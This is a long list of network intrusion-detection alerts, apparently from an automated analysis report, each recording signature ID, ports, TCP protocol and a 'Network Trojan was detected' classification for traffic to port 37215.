                  SID:2835222
                  Source Port:40810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.755062
                  SID:2835222
                  Source Port:33304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941033
                  SID:2835222
                  Source Port:57468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915433
                  SID:2835222
                  Source Port:54512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247201
                  SID:2829579
                  Source Port:54934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.931354
                  SID:2829579
                  Source Port:49494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148665
                  SID:2829579
                  Source Port:43092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.609298
                  SID:2829579
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815715
                  SID:2835222
                  Source Port:60036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.074634
                  SID:2829579
                  Source Port:36922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.380846
                  SID:2829579
                  Source Port:47478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.949585
                  SID:2829579
                  Source Port:41190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.208754
                  SID:2829579
                  Source Port:38492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.761558
                  SID:2835222
                  Source Port:55238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.618688
                  SID:2835222
                  Source Port:55142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.791889
                  SID:2835222
                  Source Port:32824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.439576
                  SID:2835222
                  Source Port:60896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.803145
                  SID:2829579
                  Source Port:52826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.054168
                  SID:2835222
                  Source Port:44000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.638682
                  SID:2829579
                  Source Port:55740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.183913
                  SID:2829579
                  Source Port:59726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202561
                  SID:2829579
                  Source Port:47822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.630762
                  SID:2829579
                  Source Port:56088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965193
                  SID:2829579
                  Source Port:42648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.514704
                  SID:2829579
                  Source Port:41488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.614606
                  SID:2835222
                  Source Port:56156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.455188
                  SID:2835222
                  Source Port:53824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.007312
                  SID:2835222
                  Source Port:60026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.418870
                  SID:2829579
                  Source Port:49236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.906584
                  SID:2835222
                  Source Port:58414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2829579
                  Source Port:52512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.037222
                  SID:2829579
                  Source Port:44340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.964630
                  SID:2829579
                  Source Port:50438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.767297
                  SID:2835222
                  Source Port:58494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.998730
                  SID:2835222
                  Source Port:58072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.900584
                  SID:2829579
                  Source Port:44512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650241
                  SID:2829579
                  Source Port:55762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.055079
                  SID:2835222
                  Source Port:38372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.246855
                  SID:2835222
                  Source Port:47518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.620881
                  SID:2835222
                  Source Port:58192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.564208
                  SID:2835222
                  Source Port:46142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058852
                  SID:2829579
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324318
                  SID:2829579
                  Source Port:51218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370410
                  SID:2829579
                  Source Port:40186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2829579
                  Source Port:43016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.663247
                  SID:2829579
                  Source Port:40792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.205461
                  SID:2835222
                  Source Port:50832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448346
                  SID:2829579
                  Source Port:51368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.928698
                  SID:2835222
                  Source Port:51578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.804179
                  SID:2835222
                  Source Port:45992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667914
                  SID:2835222
                  Source Port:32782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.350291
                  SID:2835222
                  Source Port:57508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.869389
                  SID:2835222
                  Source Port:51098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.847591
                  SID:2829579
                  Source Port:33690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.768963
                  SID:2829579
                  Source Port:49156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.327532
                  SID:2829579
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.483739
                  SID:2835222
                  Source Port:37308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.880000
                  SID:2835222
                  Source Port:38512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.552864
                  SID:2835222
                  Source Port:33602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537830
                  SID:2835222
                  Source Port:52870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2835222
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.554378
                  SID:2835222
                  Source Port:46832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.956597
                  SID:2835222
                  Source Port:41492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972385
                  SID:2829579
                  Source Port:37162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.910234
                  SID:2835222
                  Source Port:46884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.926927
                  SID:2835222
                  Source Port:43734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.334261
                  SID:2829579
                  Source Port:38060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121645
                  SID:2829579
                  Source Port:44620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815715
                  SID:2835222
                  Source Port:43738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.026223
                  SID:2829579
                  Source Port:39292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.198256
                  SID:2829579
                  Source Port:59152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.485582
                  SID:2829579
                  Source Port:56444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431217
                  SID:2835222
                  Source Port:48266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583346
                  SID:2829579
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.015024
                  SID:2829579
                  Source Port:39920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.655197
                  SID:2835222
                  Source Port:45924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.878882
                  SID:2835222
                  Source Port:35420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.866753
                  SID:2835222
                  Source Port:56846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622607
                  SID:2835222
                  Source Port:47640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376838
                  SID:2829579
                  Source Port:44028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860875
                  SID:2829579
                  Source Port:46238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.906366
                  SID:2829579
                  Source Port:50502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.233707
                  SID:2835222
                  Source Port:42924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.154220
                  SID:2835222
                  Source Port:54860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157355
                  SID:2835222
                  Source Port:37248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257130
                  SID:2829579
                  Source Port:59286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.524007
                  SID:2835222
                  Source Port:56588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589682
                  SID:2829579
                  Source Port:55200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.114397
                  SID:2829579
                  Source Port:46718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163941
                  SID:2835222
                  Source Port:45902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.897111
                  SID:2835222
                  Source Port:55882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431217
                  SID:2835222
                  Source Port:49586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012931
                  SID:2829579
                  Source Port:54018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186613
                  SID:2829579
                  Source Port:32866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.048424
                  SID:2829579
                  Source Port:60026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.920264
                  SID:2835222
                  Source Port:58292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.789703
                  SID:2835222
                  Source Port:46150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.783128
                  SID:2829579
                  Source Port:53104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790655
                  SID:2829579
                  Source Port:50744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526577
                  SID:2829579
                  Source Port:40690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.970965
                  SID:2829579
                  Source Port:49346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.598591
                  SID:2829579
                  Source Port:55986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.773632
                  SID:2835222
                  Source Port:44326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.827903
                  SID:2829579
                  Source Port:52560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330263
                  SID:2829579
                  Source Port:39448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.577437
                  SID:2835222
                  Source Port:60854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.822075
                  SID:2829579
                  Source Port:53756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.547774
                  SID:2835222
                  Source Port:60136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006085
                  SID:2835222
                  Source Port:60616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.969981
                  SID:2835222
                  Source Port:33228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437394
                  SID:2829579
                  Source Port:44426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152371
                  SID:2829579
                  Source Port:34300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.035788
                  SID:2835222
                  Source Port:43974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.280780
                  SID:2829579
                  Source Port:35716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.495020
                  SID:2835222
                  Source Port:43986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.661983
                  SID:2829579
                  Source Port:57352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.036328
                  SID:2829579
                  Source Port:53728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.165302
                  SID:2835222
                  Source Port:57180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.714271
                  SID:2835222
                  Source Port:39480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.884965
                  SID:2835222
                  Source Port:40566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.905931
                  SID:2829579
                  Source Port:46396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.064217
                  SID:2835222
                  Source Port:38780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.075080
                  SID:2835222
                  Source Port:59586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.266829
                  SID:2835222
                  Source Port:54692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.922024
                  SID:2829579
                  Source Port:33678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561854
                  SID:2829579
                  Source Port:33028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.040867
                  SID:2835222
                  Source Port:52646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.439296
                  SID:2829579
                  Source Port:53236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523968
                  SID:2835222
                  Source Port:59594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.970301
                  SID:2829579
                  Source Port:40026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489272
                  SID:2835222
                  Source Port:47670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.540964
                  SID:2835222
                  Source Port:53844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.877145
                  SID:2829579
                  Source Port:44150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932018
                  SID:2829579
                  Source Port:52550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175364
                  SID:2835222
                  Source Port:60444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.366106
                  SID:2829579
                  Source Port:50456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.177669
                  SID:2835222
                  Source Port:60298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833898
                  SID:2835222
                  Source Port:49330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.180724
                  SID:2835222
                  Source Port:42374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.141035
                  SID:2829579
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563571
                  SID:2835222
                  Source Port:42628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406451
                  SID:2829579
                  Source Port:48026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885760
                  SID:2835222
                  Source Port:48030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.371632
                  SID:2829579
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.432094
                  SID:2829579
                  Source Port:32918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.838887
                  SID:2835222
                  Source Port:46776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.249652
                  SID:2835222
                  Source Port:37712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.707998
                  SID:2829579
                  Source Port:49468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.930785
                  SID:2835222
                  Source Port:54848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.461337
                  SID:2829579
                  Source Port:47512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.861277
                  SID:2835222
                  Source Port:35256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.873958
                  SID:2829579
                  Source Port:50334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.673739
                  SID:2829579
                  Source Port:37542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188754
                  SID:2829579
                  Source Port:40684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856706
                  SID:2829579
                  Source Port:41770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.646163
                  SID:2829579
                  Source Port:55564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985127
                  SID:2835222
                  Source Port:33742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.491059
                  SID:2835222
                  Source Port:53586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.021892
                  SID:2835222
                  Source Port:42796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.476444
                  SID:2835222
                  Source Port:57424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186614
                  SID:2835222
                  Source Port:56838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965651
                  SID:2835222
                  Source Port:52214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.681754
                  SID:2835222
                  Source Port:49824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.080592
                  SID:2829579
                  Source Port:58208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559180
                  SID:2835222
                  Source Port:39878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290878
                  SID:2835222
                  Source Port:32822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.122921
                  SID:2835222
                  Source Port:38604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.961510
                  SID:2829579
                  Source Port:38580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.887651
                  SID:2835222
                  Source Port:52382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927814
                  SID:2829579
                  Source Port:41434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.983079
                  SID:2829579
                  Source Port:54814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641375
                  SID:2829579
                  Source Port:48384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962060
                  SID:2835222
                  Source Port:48078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772841
                  SID:2835222
                  Source Port:41712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.220659
                  SID:2835222
                  Source Port:45544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.345555
                  SID:2835222
                  Source Port:38630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383966
                  SID:2829579
                  Source Port:45782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.975524
                  SID:2829579
                  Source Port:54194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.506751
                  SID:2829579
                  Source Port:34374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005251
                  SID:2835222
                  Source Port:51872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.563022
                  SID:2829579
                  Source Port:60628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.141035
                  SID:2835222
                  Source Port:38618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527286
                  SID:2835222
                  Source Port:41974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
